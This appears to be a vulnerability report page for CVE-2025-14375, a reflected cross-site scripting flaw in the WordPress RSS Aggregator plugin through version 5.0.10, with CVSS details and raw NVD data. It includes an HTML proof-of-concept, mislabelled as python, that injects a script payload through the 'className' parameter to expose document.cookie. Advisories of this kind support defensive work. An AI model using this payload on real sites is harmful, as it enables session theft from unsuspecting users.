Security Vulnerability Report
中文
CVE-2025-14375 CVSS 6.1 MEDIUM

CVE-2025-14375

Published: 2026-01-16 08:15:46
Last Modified: 2026-04-15 00:35:42

Description

The RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘className’ parameter in all versions up to, and including, 5.0.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

RSS Aggregator插件 <= 5.0.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-14375 Reflected XSS PoC --> <!-- Target: WordPress RSS Aggregator Plugin <= 5.0.10 --> <!-- Attack Vector: className parameter --> <!DOCTYPE html> <html> <head> <title>CVE-2025-14375 PoC</title> </head> <body> <h3>CVE-2025-14375 Reflected XSS PoC</h3> <p>Target: WordPress with RSS Aggregator Plugin <= 5.0.10</p> <!-- Malicious URL --> <a href='http://target-wordpress-site/?className=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C' target='_blank'>Click Me (XSS Payload)</a> <p>Or use this URL directly:</p> <code id='xss-url'></code> <script> var targetUrl = window.location.origin + '/?'; var xssPayload = 'className="><script>alert(document.cookie)</script><"'; var maliciousUrl = targetUrl + encodeURIComponent(xssPayload).replace('%3D', '='); document.getElementById('xss-url').textContent = maliciousUrl; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14375", "sourceIdentifier": "[email protected]", "published": "2026-01-16T08:15:46.050", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘className’ parameter in all versions up to, and including, 5.0.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin RSS Aggregator – RSS Import, News Feeds, Feed a Post, and Autoblogging para WordPress es vulnerable a cross-site scripting reflejado a través del parámetro 'className' en todas las versiones hasta la 5.0.10, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto posibilita que atacantes no autenticados inyecten scripts web arbitrarios en páginas que se ejecutan si logran engañar a un usuario para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3439384/wp-rss-aggregator", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3d2dde13-2940-478e-8e2b-baf60003754a?source=cve", "source": "[email protected]"}]}}